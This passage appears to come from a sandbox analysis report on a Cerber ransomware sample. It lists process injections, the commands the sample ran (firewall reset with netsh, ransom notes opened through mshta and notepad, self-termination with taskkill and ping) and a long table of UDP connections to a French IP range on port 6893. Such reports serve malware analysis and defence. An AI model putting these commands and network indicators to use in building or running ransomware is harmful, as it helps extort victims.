PID 2192 wrote to memory of 2276 N/A C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe C:\Windows\SysWOW64\NOTEPAD.EXE
PID 2192 wrote to memory of 2276 N/A C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe C:\Windows\SysWOW64\NOTEPAD.EXE
PID 2192 wrote to memory of 2876 N/A C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe C:\Windows\SysWOW64\cmd.exe
PID 2192 wrote to memory of 2876 N/A C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe C:\Windows\SysWOW64\cmd.exe
PID 2192 wrote to memory of 2876 N/A C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe C:\Windows\SysWOW64\cmd.exe
PID 2192 wrote to memory of 2876 N/A C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe C:\Windows\SysWOW64\cmd.exe
PID 2876 wrote to memory of 2244 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 2876 wrote to memory of 2244 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 2876 wrote to memory of 2244 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 2876 wrote to memory of 2244 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 2876 wrote to memory of 1840 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 2876 wrote to memory of 1840 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 2876 wrote to memory of 1840 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 2876 wrote to memory of 1840 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE

Processes

C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe

"C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe"

C:\Windows\SysWOW64\netsh.exe

C:\Windows\system32\netsh.exe advfirewall set allprofiles state on

C:\Windows\SysWOW64\netsh.exe

C:\Windows\system32\netsh.exe advfirewall reset

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Desktop\_R_E_A_D___T_H_I_S___WK6IB3_.hta"

C:\Windows\SysWOW64\NOTEPAD.EXE

"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\_R_E_A_D___T_H_I_S___VBTJZKN_.txt

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe"

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im "cerber.exe"

C:\Windows\SysWOW64\PING.EXE

ping -n 1 127.0.0.1

C:\Windows\system32\taskmgr.exe

"C:\Windows\system32\taskmgr.exe" /4

C:\Windows\system32\LogonUI.exe

"LogonUI.exe" /flags:0x0

C:\Windows\system32\LogonUI.exe

"LogonUI.exe" /flags:0x0

C:\Windows\system32\LogonUI.exe

"LogonUI.exe" /flags:0x0

C:\Windows\system32\LogonUI.exe

"LogonUI.exe" /flags:0x0

C:\Windows\system32\LogonUI.exe

"LogonUI.exe" /flags:0x0

Network

Country Destination Domain Proto
FR 178.33.158.0:6893 udp
FR 178.33.158.1:6893 udp
FR 178.33.158.2:6893 udp
FR 178.33.158.3:6893 udp
FR 178.33.158.4:6893 udp
FR 178.33.158.5:6893 udp
FR 178.33.158.6:6893 udp
FR 178.33.158.7:6893 udp
FR 178.33.158.8:6893 udp
FR 178.33.158.9:6893 udp
FR 178.33.158.10:6893 udp
FR 178.33.158.11:6893 udp
FR 178.33.158.12:6893 udp
FR 178.33.158.13:6893 udp
FR 178.33.158.14:6893 udp
FR 178.33.158.15:6893 udp
FR 178.33.158.16:6893 udp
FR 178.33.158.17:6893 udp
FR 178.33.158.18:6893 udp
FR 178.33.158.19:6893 udp
FR 178.33.158.20:6893 udp
FR 178.33.158.21:6893 udp
FR 178.33.158.22:6893 udp
FR 178.33.158.23:6893 udp
FR 178.33.158.24:6893 udp
FR 178.33.158.25:6893 udp
FR 178.33.158.26:6893 udp
FR 178.33.158.27:6893 udp
FR 178.33.158.28:6893 udp
FR 178.33.158.29:6893 udp
FR 178.33.158.30:6893 udp
FR 178.33.158.31:6893 udp
FR 178.33.159.0:6893 udp
FR 178.33.159.1:6893 udp
FR 178.33.159.2:6893 udp
FR 178.33.159.3:6893 udp
FR 178.33.159.4:6893 udp
FR 178.33.159.5:6893 udp
FR 178.33.159.6:6893 udp
FR 178.33.159.7:6893 udp
FR 178.33.159.8:6893 udp
FR 178.33.159.9:6893 udp
FR 178.33.159.10:6893 udp
FR 178.33.159.11:6893 udp
FR 178.33.159.12:6893 udp
FR 178.33.159.13:6893 udp
FR 178.33.159.14:6893 udp
FR 178.33.159.15:6893 udp
FR 178.33.159.16:6893 udp
FR 178.33.159.17:6893 udp
FR 178.33.159.18:6893 udp
FR 178.33.159.19:6893 udp
FR 178.33.159.20:6893 udp
FR 178.33.159.21:6893 udp
FR 178.33.159.22:6893 udp
FR 178.33.159.23:6893 udp
FR 178.33.159.24:6893 udp
FR 178.33.159.25:6893 udp
FR 178.33.159.26:6893 udp
FR 178.33.159.27:6893 udp
FR 178.33.159.28:6893 udp
FR 178.33.159.29:6893 udp
FR 178.33.159.30:6893 udp
FR 178.33.159.31:6893 udp
FR 178.33.160.0:6893 udp
FR 178.33.160.1:6893 udp
FR 178.33.160.2:6893 udp
FR 178.33.160.3:6893 udp
FR 178.33.160.4:6893 udp
FR 178.33.160.5:6893 udp
FR 178.33.160.6:6893 udp
FR 178.33.160.7:6893 udp
FR 178.33.160.8:6893 udp
FR 178.33.160.9:6893 udp
FR 178.33.160.10:6893 udp
FR 178.33.160.11:6893 udp
FR 178.33.160.12:6893 udp
FR 178.33.160.13:6893 udp
FR 178.33.160.14:6893 udp
FR 178.33.160.15:6893 udp
FR 178.33.160.16:6893 udp
FR 178.33.160.17:6893 udp
FR 178.33.160.18:6893 udp
FR 178.33.160.19:6893 udp
FR 178.33.160.20:6893 udp
FR 178.33.160.21:6893 udp
FR 178.33.160.22:6893 udp
FR 178.33.160.23:6893 udp
FR 178.33.160.24:6893 udp
FR 178.33.160.25:6893 udp
FR 178.33.160.26:6893 udp
FR 178.33.160.27:6893 udp
FR 178.33.160.28:6893 udp
FR 178.33.160.29:6893 udp
FR 178.33.160.30:6893 udp
FR 178.33.160.31:6893 udp
FR 178.33.160.32:6893 udp
FR 178.33.160.33:6893 udp
FR 178.33.160.34:6893 udp
FR 178.33.160.35:6893 udp
FR 178.33.160.36:6893 udp
FR 178.33.160.37:6893 udp
FR 178.33.160.38:6893 udp
FR 178.33.160.39:6893 udp
FR 178.33.160.40:6893 udp
FR 178.33.160.41:6893 udp
FR 178.33.160.42:6893 udp
FR 178.33.160.43:6893 udp
FR 178.33.160.44:6893 udp
FR 178.33.160.45:6893 udp
FR 178.33.160.46:6893 udp
FR 178.33.160.47:6893 udp
FR 178.33.160.48:6893 udp
FR 178.33.160.49:6893 udp
FR 178.33.160.50:6893 udp
FR 178.33.160.51:6893 udp
FR 178.33.160.52:6893 udp
FR 178.33.160.53:6893 udp
FR 178.33.160.54:6893 udp
FR 178.33.160.55:6893 udp
FR 178.33.160.56:6893 udp
FR 178.33.160.57:6893 udp
FR 178.33.160.58:6893 udp
FR 178.33.160.59:6893 udp
FR 178.33.160.60:6893 udp
FR 178.33.160.61:6893 udp
FR 178.33.160.62:6893 udp
FR 178.33.160.63:6893 udp
FR 178.33.160.64:6893 udp
FR 178.33.160.65:6893 udp
FR 178.33.160.66:6893 udp
FR 178.33.160.67:6893 udp
FR 178.33.160.68:6893 udp
FR 178.33.160.69:6893 udp
FR 178.33.160.70:6893 udp
FR 178.33.160.71:6893 udp
FR 178.33.160.72:6893 udp
FR 178.33.160.73:6893 udp
FR 178.33.160.74:6893 udp
FR 178.33.160.75:6893 udp
FR 178.33.160.76:6893 udp
FR 178.33.160.77:6893 udp
FR 178.33.160.78:6893 udp
FR 178.33.160.79:6893 udp
FR 178.33.160.80:6893 udp
FR 178.33.160.81:6893 udp
FR 178.33.160.82:6893 udp
FR 178.33.160.83:6893 udp
FR 178.33.160.84:6893 udp
FR 178.33.160.85:6893 udp
FR 178.33.160.86:6893 udp
FR 178.33.160.87:6893 udp
FR 178.33.160.88:6893 udp
FR 178.33.160.89:6893 udp
FR 178.33.160.90:6893 udp
FR 178.33.160.91:6893 udp
FR 178.33.160.92:6893 udp
FR 178.33.160.93:6893 udp
FR 178.33.160.94:6893 udp
FR 178.33.160.95:6893 udp
FR 178.33.160.96:6893 udp
FR 178.33.160.97:6893 udp
FR 178.33.160.98:6893 udp
FR 178.33.160.99:6893 udp
FR 178.33.160.100:6893 udp
FR 178.33.160.101:6893 udp
FR 178.33.160.102:6893 udp
FR 178.33.160.103:6893 udp
FR 178.33.160.104:6893 udp
FR 178.33.160.105:6893 udp
FR 178.33.160.106:6893 udp
FR 178.33.160.107:6893 udp
FR 178.33.160.108:6893 udp
FR 178.33.160.109:6893 udp
FR 178.33.160.110:6893 udp
FR 178.33.160.111:6893 udp
FR 178.33.160.112:6893 udp
FR 178.33.160.113:6893 udp
FR 178.33.160.114:6893 udp
FR 178.33.160.115:6893 udp
FR 178.33.160.116:6893 udp
FR 178.33.160.117:6893 udp
FR 178.33.160.118:6893 udp
FR 178.33.160.119:6893 udp
FR 178.33.160.120:6893 udp
FR 178.33.160.121:6893 udp
FR 178.33.160.122:6893 udp
FR 178.33.160.123:6893 udp
FR 178.33.160.124:6893 udp
FR 178.33.160.125:6893 udp
FR 178.33.160.126:6893 udp
FR 178.33.160.127:6893 udp
FR 178.33.160.128:6893 udp
FR 178.33.160.129:6893 udp
FR 178.33.160.130:6893 udp
FR 178.33.160.131:6893 udp
FR 178.33.160.132:6893 udp
FR 178.33.160.133:6893 udp
FR 178.33.160.134:6893 udp
FR 178.33.160.135:6893 udp
FR 178.33.160.136:6893 udp
FR 178.33.160.137:6893 udp
FR 178.33.160.138:6893 udp
FR 178.33.160.139:6893 udp
FR 178.33.160.140:6893 udp
FR 178.33.160.141:6893 udp
FR 178.33.160.142:6893 udp
FR 178.33.160.143:6893 udp
FR 178.33.160.144:6893 udp
FR 178.33.160.145:6893 udp
FR 178.33.160.146:6893 udp
FR 178.33.160.147:6893 udp
FR 178.33.160.148:6893 udp
FR 178.33.160.149:6893 udp
FR 178.33.160.150:6893 udp
FR 178.33.160.151:6893 udp
FR 178.33.160.152:6893 udp
FR 178.33.160.153:6893 udp
FR 178.33.160.154:6893 udp
FR 178.33.160.155:6893 udp
FR 178.33.160.156:6893 udp
FR 178.33.160.157:6893 udp
FR 178.33.160.158:6893 udp
FR 178.33.160.159:6893 udp
FR 178.33.160.160:6893 udp
FR 178.33.160.161:6893 udp
FR 178.33.160.162:6893 udp
FR 178.33.160.163:6893 udp
FR 178.33.160.164:6893 udp
FR 178.33.160.165:6893 udp
FR 178.33.160.166:6893 udp
FR 178.33.160.167:6893 udp
FR 178.33.160.168:6893 udp
FR 178.33.160.169:6893 udp
FR 178.33.160.170:6893 udp
FR 178.33.160.171:6893 udp
FR 178.33.160.172:6893 udp
FR 178.33.160.173:6893 udp
FR 178.33.160.174:6893 udp
FR 178.33.160.175:6893 udp
FR 178.33.160.176:6893 udp
FR 178.33.160.177:6893 udp
FR 178.33.160.178:6893 udp
FR 178.33.160.179:6893 udp
FR 178.33.160.180:6893 udp
FR 178.33.160.181:6893 udp
FR 178.33.160.182:6893 udp
FR 178.33.160.183:6893 udp
FR 178.33.160.184:6893 udp
FR 178.33.160.185:6893 udp
FR 178.33.160.186:6893 udp
FR 178.33.160.187:6893 udp
FR 178.33.160.188:6893 udp
FR 178.33.160.189:6893 udp
FR 178.33.160.190:6893 udp
FR 178.33.160.191:6893 udp
FR 178.33.160.192:6893 udp
FR 178.33.160.193:6893 udp
FR 178.33.160.194:6893 udp
FR 178.33.160.195:6893 udp
FR 178.33.160.196:6893 udp
FR 178.33.160.197:6893 udp
FR 178.33.160.198:6893 udp
FR 178.33.160.199:6893 udp
FR 178.33.160.200:6893 udp
FR 178.33.160.201:6893 udp
FR 178.33.160.202:6893 udp
FR 178.33.160.203:6893 udp
FR 178.33.160.204:6893 udp
FR 178.33.160.205:6893 udp
FR 178.33.160.206:6893 udp
FR 178.33.160.207:6893 udp
FR 178.33.160.208:6893 udp
FR 178.33.160.209:6893 udp
FR 178.33.160.210:6893 udp
FR 178.33.160.211:6893 udp
FR 178.33.160.212:6893 udp
FR 178.33.160.213:6893 udp
FR 178.33.160.214:6893 udp
FR 178.33.160.215:6893 udp
FR 178.33.160.216:6893 udp
FR 178.33.160.217:6893 udp
FR 178.33.160.218:6893 udp
FR 178.33.160.219:6893 udp
FR 178.33.160.220:6893 udp
FR 178.33.160.221:6893 udp
FR 178.33.160.222:6893 udp
FR 178.33.160.223:6893 udp
FR 178.33.160.224:6893 udp
FR 178.33.160.225:6893 udp
FR 178.33.160.226:6893 udp
FR 178.33.160.227:6893 udp
FR 178.33.160.228:6893 udp
FR 178.33.160.229:6893 udp
FR 178.33.160.230:6893 udp
FR 178.33.160.231:6893 udp
FR 178.33.160.232:6893 udp
FR 178.33.160.233:6893 udp
FR 178.33.160.234:6893 udp
FR 178.33.160.235:6893 udp
FR 178.33.160.236:6893 udp
FR 178.33.160.237:6893 udp
FR 178.33.160.238:6893 udp
FR 178.33.160.239:6893 udp
FR 178.33.160.240:6893 udp
FR 178.33.160.241:6893 udp
FR 178.33.160.242:6893 udp
FR 178.33.160.243:6893 udp
FR 178.33.160.244:6893 udp
FR 178.33.160.245:6893 udp
FR 178.33.160.246:6893 udp
FR 178.33.160.247:6893 udp
FR 178.33.160.248:6893 udp
FR 178.33.160.249:6893 udp
FR 178.33.160.250:6893 udp
FR 178.33.160.251:6893 udp
FR 178.33.160.252:6893 udp
FR 178.33.160.253:6893 udp
FR 178.33.160.254:6893 udp
FR 178.33.160.255:6893 udp
FR 178.33.161.0:6893 udp
FR 178.33.161.1:6893 udp
FR 178.33.161.2:6893 udp
FR 178.33.161.3:6893 udp
FR 178.33.161.4:6893 udp
FR 178.33.161.5:6893 udp
FR 178.33.161.6:6893 udp
FR 178.33.161.7:6893 udp
FR 178.33.161.8:6893 udp
FR 178.33.161.9:6893 udp
FR 178.33.161.10:6893 udp
FR 178.33.161.11:6893 udp
FR 178.33.161.12:6893 udp
FR 178.33.161.13:6893 udp
FR 178.33.161.14:6893 udp
FR 178.33.161.15:6893 udp
FR 178.33.161.16:6893 udp
FR 178.33.161.17:6893 udp
FR 178.33.161.18:6893 udp
FR 178.33.161.19:6893 udp
FR 178.33.161.20:6893 udp
FR 178.33.161.21:6893 udp
FR 178.33.161.22:6893 udp
FR 178.33.161.23:6893 udp
FR 178.33.161.24:6893 udp
FR 178.33.161.25:6893 udp
FR 178.33.161.26:6893 udp
FR 178.33.161.27:6893 udp
FR 178.33.161.28:6893 udp
FR 178.33.161.29:6893 udp
FR 178.33.161.30:6893 udp
FR 178.33.161.31:6893 udp
FR 178.33.161.32:6893 udp
FR 178.33.161.33:6893 udp
FR 178.33.161.34:6893 udp
FR 178.33.161.35:6893 udp
FR 178.33.161.36:6893 udp
FR 178.33.161.37:6893 udp
FR 178.33.161.38:6893 udp
FR 178.33.161.39:6893 udp
FR 178.33.161.40:6893 udp
FR 178.33.161.41:6893 udp
FR 178.33.161.42:6893 udp
FR 178.33.161.43:6893 udp
FR 178.33.161.44:6893 udp
FR 178.33.161.45:6893 udp
FR 178.33.161.46:6893 udp
FR 178.33.161.47:6893 udp
FR 178.33.161.48:6893 udp
FR 178.33.161.49:6893 udp
FR 178.33.161.50:6893 udp
FR 178.33.161.51:6893 udp
FR 178.33.161.52:6893 udp
FR 178.33.161.53:6893 udp
FR 178.33.161.54:6893 udp
FR 178.33.161.55:6893 udp
FR 178.33.161.56:6893 udp
FR 178.33.161.57:6893 udp
FR 178.33.161.58:6893 udp
FR 178.33.161.59:6893 udp
FR 178.33.161.60:6893 udp
FR 178.33.161.61:6893 udp
FR 178.33.161.62:6893 udp
FR 178.33.161.63:6893 udp
FR 178.33.161.64:6893 udp
FR 178.33.161.65:6893 udp
FR 178.33.161.66:6893 udp
FR 178.33.161.67:6893 udp
FR 178.33.161.68:6893 udp
FR 178.33.161.69:6893 udp
FR 178.33.161.70:6893 udp
FR 178.33.161.71:6893 udp
FR 178.33.161.72:6893 udp
FR 178.33.161.73:6893 udp
FR 178.33.161.74:6893 udp
FR 178.33.161.75:6893 udp
FR 178.33.161.76:6893 udp
FR 178.33.161.77:6893 udp
FR 178.33.161.78:6893 udp
FR 178.33.161.79:6893 udp
FR 178.33.161.80:6893 udp
FR 178.33.161.81:6893 udp
FR 178.33.161.82:6893 udp
FR 178.33.161.83:6893 udp
FR 178.33.161.84:6893 udp
FR 178.33.161.85:6893 udp
FR 178.33.161.86:6893 udp
FR 178.33.161.87:6893 udp
FR 178.33.161.88:6893 udp
FR 178.33.161.89:6893 udp
FR 178.33.161.90:6893 udp
FR 178.33.161.91:6893 udp
FR 178.33.161.92:6893 udp
FR 178.33.161.93:6893 udp
FR 178.33.161.94:6893 udp
FR 178.33.161.95:6893 udp
FR 178.33.161.96:6893 udp
FR 178.33.161.97:6893 udp
FR 178.33.161.98:6893 udp
FR 178.33.161.99:6893 udp
FR 178.33.161.100:6893 udp
FR 178.33.161.101:6893 udp
FR 178.33.161.102:6893 udp
FR 178.33.161.103:6893 udp
FR 178.33.161.104:6893 udp
FR 178.33.161.105:6893 udp
FR 178.33.161.106:6893 udp
FR 178.33.161.107:6893 udp
FR 178.33.161.108:6893 udp
FR 178.33.161.109:6893 udp
FR 178.33.161.110:6893 udp
FR 178.33.161.111:6893 udp
FR 178.33.161.112:6893 udp
FR 178.33.161.113:6893 udp
FR 178.33.161.114:6893 udp
FR 178.33.161.115:6893 udp
FR 178.33.161.116:6893 udp
FR 178.33.161.117:6893 udp
FR 178.33.161.118:6893 udp
FR 178.33.161.119:6893 udp
FR 178.33.161.120:6893 udp
FR 178.33.161.121:6893 udp
FR 178.33.161.122:6893 udp
FR 178.33.161.123:6893 udp
FR 178.33.161.124:6893 udp
FR 178.33.161.125:6893 udp
FR 178.33.161.126:6893 udp
FR 178.33.161.127:6893 udp
FR 178.33.161.128:6893 udp
FR 178.33.161.129:6893 udp
FR 178.33.161.130:6893 udp
FR 178.33.161.131:6893 udp
FR 178.33.161.132:6893 udp
FR 178.33.161.133:6893 udp
FR 178.33.161.134:6893 udp
FR 178.33.161.135:6893 udp
FR 178.33.161.136:6893 udp
FR 178.33.161.137:6893 udp
FR 178.33.161.138:6893 udp
FR 178.33.161.139:6893 udp
FR 178.33.161.140:6893 udp
FR 178.33.161.141:6893 udp
FR 178.33.161.142:6893 udp
FR 178.33.161.143:6893 udp
FR 178.33.161.144:6893 udp
FR 178.33.161.145:6893 udp
FR 178.33.161.146:6893 udp
FR 178.33.161.147:6893 udp
FR 178.33.161.148:6893 udp
FR 178.33.161.149:6893 udp
FR 178.33.161.150:6893 udp
FR 178.33.161.151:6893 udp
FR 178.33.161.152:6893 udp
FR 178.33.161.153:6893 udp
FR 178.33.161.154:6893 udp
FR 178.33.161.155:6893 udp
FR 178.33.161.156:6893 udp
FR 178.33.161.157:6893 udp
FR 178.33.161.158:6893 udp
FR 178.33.161.159:6893 udp
FR 178.33.161.160:6893 udp
FR 178.33.161.161:6893 udp
FR 178.33.161.162:6893 udp
FR 178.33.161.163:6893 udp
FR 178.33.161.164:6893 udp
FR 178.33.161.165:6893 udp
FR 178.33.161.166:6893 udp
FR 178.33.161.167:6893 udp
FR 178.33.161.168:6893 udp
FR 178.33.161.169:6893 udp
FR 178.33.161.170:6893 udp
FR 178.33.161.171:6893 udp
FR 178.33.161.172:6893 udp
FR 178.33.161.173:6893 udp
FR 178.33.161.174:6893 udp
FR 178.33.161.175:6893 udp
FR 178.33.161.176:6893 udp
FR 178.33.161.177:6893 udp
FR 178.33.161.178:6893 udp
FR 178.33.161.179:6893 udp
FR 178.33.161.180:6893 udp
FR 178.33.161.181:6893 udp
FR 178.33.161.182:6893 udp
FR 178.33.161.183:6893 udp
FR 178.33.161.184:6893 udp
FR 178.33.161.185:6893 udp
FR 178.33.161.186:6893 udp
FR 178.33.161.187:6893 udp
FR 178.33.161.188:6893 udp
FR 178.33.161.189:6893 udp
FR 178.33.161.190:6893 udp
FR 178.33.161.191:6893 udp
FR 178.33.161.192:6893 udp
FR 178.33.161.193:6893 udp
FR 178.33.161.194:6893 udp
FR 178.33.161.195:6893 udp
FR 178.33.161.196:6893 udp
FR 178.33.161.197:6893 udp
FR 178.33.161.198:6893 udp
FR 178.33.161.199:6893 udp
FR 178.33.161.200:6893 udp
FR 178.33.161.201:6893 udp
FR 178.33.161.202:6893 udp
FR 178.33.161.203:6893 udp
FR 178.33.161.204:6893 udp
FR 178.33.161.205:6893 udp
FR 178.33.161.206:6893 udp
FR 178.33.161.207:6893 udp
FR 178.33.161.208:6893 udp
FR 178.33.161.209:6893 udp
FR 178.33.161.210:6893 udp
FR 178.33.161.211:6893 udp
FR 178.33.161.212:6893 udp
FR 178.33.161.213:6893 udp
FR 178.33.161.214:6893 udp
FR 178.33.161.215:6893 udp
FR 178.33.161.216:6893 udp
FR 178.33.161.217:6893 udp
FR 178.33.161.218:6893 udp
FR 178.33.161.219:6893 udp
FR 178.33.161.220:6893 udp
FR 178.33.161.221:6893 udp
FR 178.33.161.222:6893 udp
FR 178.33.161.223:6893 udp
FR 178.33.161.224:6893 udp
FR 178.33.161.225:6893 udp
FR 178.33.161.226:6893 udp
FR 178.33.161.227:6893 udp
FR 178.33.161.228:6893 udp
FR 178.33.161.229:6893 udp
FR 178.33.161.230:6893 udp
FR 178.33.161.231:6893 udp
FR 178.33.161.232:6893 udp
FR 178.33.161.233:6893 udp
FR 178.33.161.234:6893 udp
FR 178.33.161.235:6893 udp
FR 178.33.161.236:6893 udp
FR 178.33.161.237:6893 udp
FR 178.33.161.238:6893 udp
FR 178.33.161.239:6893 udp
FR 178.33.161.240:6893 udp
FR 178.33.161.241:6893 udp
FR 178.33.161.242:6893 udp
FR 178.33.161.243:6893 udp
FR 178.33.161.244:6893 udp
FR 178.33.161.245:6893 udp
FR 178.33.161.246:6893 udp
FR 178.33.161.247:6893 udp
FR 178.33.161.248:6893 udp
FR 178.33.161.249:6893 udp
FR 178.33.161.250:6893 udp
FR 178.33.161.251:6893 udp
FR 178.33.161.252:6893 udp
FR 178.33.161.253:6893 udp
FR 178.33.161.254:6893 udp
FR 178.33.161.255:6893 udp
FR 178.33.162.0:6893 udp
FR 178.33.162.1:6893 udp
FR 178.33.162.2:6893 udp
FR 178.33.162.3:6893 udp
FR 178.33.162.4:6893 udp
FR 178.33.162.5:6893 udp
FR 178.33.162.6:6893 udp
FR 178.33.162.7:6893 udp
FR 178.33.162.8:6893 udp
FR 178.33.162.9:6893 udp
FR 178.33.162.10:6893 udp
FR 178.33.162.11:6893 udp
FR 178.33.162.12:6893 udp
FR 178.33.162.13:6893 udp
FR 178.33.162.14:6893 udp
FR 178.33.162.15:6893 udp
FR 178.33.162.16:6893 udp
FR 178.33.162.17:6893 udp
FR 178.33.162.18:6893 udp
FR 178.33.162.19:6893 udp
FR 178.33.162.20:6893 udp
FR 178.33.162.21:6893 udp
FR 178.33.162.22:6893 udp
FR 178.33.162.23:6893 udp
FR 178.33.162.24:6893 udp
FR 178.33.162.25:6893 udp
FR 178.33.162.26:6893 udp
FR 178.33.162.27:6893 udp
FR 178.33.162.28:6893 udp
FR 178.33.162.29:6893 udp
FR 178.33.162.30:6893 udp
FR 178.33.162.31:6893 udp
FR 178.33.162.32:6893 udp
FR 178.33.162.33:6893 udp
FR 178.33.162.34:6893 udp
FR 178.33.162.35:6893 udp
FR 178.33.162.36:6893 udp
FR 178.33.162.37:6893 udp
FR 178.33.162.38:6893 udp
FR 178.33.162.39:6893 udp
FR 178.33.162.40:6893 udp
FR 178.33.162.41:6893 udp
FR 178.33.162.42:6893 udp
FR 178.33.162.43:6893 udp
FR 178.33.162.44:6893 udp
FR 178.33.162.45:6893 udp
FR 178.33.162.46:6893 udp
FR 178.33.162.47:6893 udp
FR 178.33.162.48:6893 udp
FR 178.33.162.49:6893 udp
FR 178.33.162.50:6893 udp
FR 178.33.162.51:6893 udp
FR 178.33.162.52:6893 udp
FR 178.33.162.53:6893 udp
FR 178.33.162.54:6893 udp
FR 178.33.162.55:6893 udp
FR 178.33.162.56:6893 udp
FR 178.33.162.57:6893 udp
FR 178.33.162.58:6893 udp
FR 178.33.162.59:6893 udp
FR 178.33.162.60:6893 udp
FR 178.33.162.61:6893 udp
FR 178.33.162.62:6893 udp
FR 178.33.162.63:6893 udp
FR 178.33.162.64:6893 udp
FR 178.33.162.65:6893 udp
FR 178.33.162.66:6893 udp
FR 178.33.162.67:6893 udp
FR 178.33.162.68:6893 udp
FR 178.33.162.69:6893 udp
FR 178.33.162.70:6893 udp
FR 178.33.162.71:6893 udp
FR 178.33.162.72:6893 udp
FR 178.33.162.73:6893 udp
FR 178.33.162.74:6893 udp
FR 178.33.162.75:6893 udp
FR 178.33.162.76:6893 udp
FR 178.33.162.77:6893 udp
FR 178.33.162.78:6893 udp
FR 178.33.162.79:6893 udp
FR 178.33.162.80:6893 udp
FR 178.33.162.81:6893 udp
FR 178.33.162.82:6893 udp
FR 178.33.162.83:6893 udp
FR 178.33.162.84:6893 udp
FR 178.33.162.85:6893 udp
FR 178.33.162.86:6893 udp
FR 178.33.162.87:6893 udp
FR 178.33.162.88:6893 udp
FR 178.33.162.89:6893 udp
FR 178.33.162.90:6893 udp
FR 178.33.162.91:6893 udp
FR 178.33.162.92:6893 udp
FR 178.33.162.93:6893 udp
FR 178.33.162.94:6893 udp
FR 178.33.162.95:6893 udp
FR 178.33.162.96:6893 udp
FR 178.33.162.97:6893 udp
FR 178.33.162.98:6893 udp
FR 178.33.162.99:6893 udp
FR 178.33.162.100:6893 udp
FR 178.33.162.101:6893 udp
FR 178.33.162.102:6893 udp
FR 178.33.162.103:6893 udp
FR 178.33.162.104:6893 udp
FR 178.33.162.105:6893 udp
FR 178.33.162.106:6893 udp
FR 178.33.162.107:6893 udp
FR 178.33.162.108:6893 udp
FR 178.33.162.109:6893 udp
FR 178.33.162.110:6893 udp
FR 178.33.162.111:6893 udp
FR 178.33.162.112:6893 udp
FR 178.33.162.113:6893 udp
FR 178.33.162.114:6893 udp
FR 178.33.162.115:6893 udp
FR 178.33.162.116:6893 udp
FR 178.33.162.117:6893 udp
FR 178.33.162.118:6893 udp
FR 178.33.162.119:6893 udp
FR 178.33.162.120:6893 udp
FR 178.33.162.121:6893 udp
FR 178.33.162.122:6893 udp
FR 178.33.162.123:6893 udp
FR 178.33.162.124:6893 udp
FR 178.33.162.125:6893 udp
FR 178.33.162.126:6893 udp
FR 178.33.162.127:6893 udp
FR 178.33.162.128:6893 udp
FR 178.33.162.129:6893 udp
FR 178.33.162.130:6893 udp
FR 178.33.162.131:6893 udp
FR 178.33.162.132:6893 udp
FR 178.33.162.133:6893 udp
FR 178.33.162.134:6893 udp
FR 178.33.162.135:6893 udp
FR 178.33.162.136:6893 udp
FR 178.33.162.137:6893 udp
FR 178.33.162.138:6893 udp
FR 178.33.162.139:6893 udp
FR 178.33.162.140:6893 udp
FR 178.33.162.141:6893 udp
FR 178.33.162.142:6893 udp
FR 178.33.162.143:6893 udp
FR 178.33.162.144:6893 udp
FR 178.33.162.145:6893 udp
FR 178.33.162.146:6893 udp
FR 178.33.162.147:6893 udp
FR 178.33.162.148:6893 udp
FR 178.33.162.149:6893 udp
FR 178.33.162.150:6893 udp
FR 178.33.162.151:6893 udp
FR 178.33.162.152:6893 udp
FR 178.33.162.153:6893 udp
FR 178.33.162.154:6893 udp
FR 178.33.162.155:6893 udp
FR 178.33.162.156:6893 udp
FR 178.33.162.157:6893 udp
FR 178.33.162.158:6893 udp
FR 178.33.162.159:6893 udp
FR 178.33.162.160:6893 udp
FR 178.33.162.161:6893 udp
FR 178.33.162.162:6893 udp
FR 178.33.162.163:6893 udp
FR 178.33.162.164:6893 udp
FR 178.33.162.165:6893 udp
FR 178.33.162.166:6893 udp
FR 178.33.162.167:6893 udp
FR 178.33.162.168:6893 udp
FR 178.33.162.169:6893 udp
FR 178.33.162.170:6893 udp
FR 178.33.162.171:6893 udp
FR 178.33.162.172:6893 udp
FR 178.33.162.173:6893 udp
FR 178.33.162.174:6893 udp
FR 178.33.162.175:6893 udp
FR 178.33.162.176:6893 udp
FR 178.33.162.177:6893 udp
FR 178.33.162.178:6893 udp
FR 178.33.162.179:6893 udp
FR 178.33.162.180:6893 udp
FR 178.33.162.181:6893 udp
FR 178.33.162.182:6893 udp
FR 178.33.162.183:6893 udp
FR 178.33.162.184:6893 udp
FR 178.33.162.185:6893 udp
FR 178.33.162.186:6893 udp
FR 178.33.162.187:6893 udp
FR 178.33.162.188:6893 udp
FR 178.33.162.189:6893 udp
FR 178.33.162.190:6893 udp
FR 178.33.162.191:6893 udp
FR 178.33.162.192:6893 udp
FR 178.33.162.193:6893 udp
FR 178.33.162.194:6893 udp
FR 178.33.162.195:6893 udp
FR 178.33.162.196:6893 udp
FR 178.33.162.197:6893 udp
FR 178.33.162.198:6893 udp
FR 178.33.162.199:6893 udp
FR 178.33.162.200:6893 udp
FR 178.33.162.201:6893 udp
FR 178.33.162.202:6893 udp
FR 178.33.162.203:6893 udp
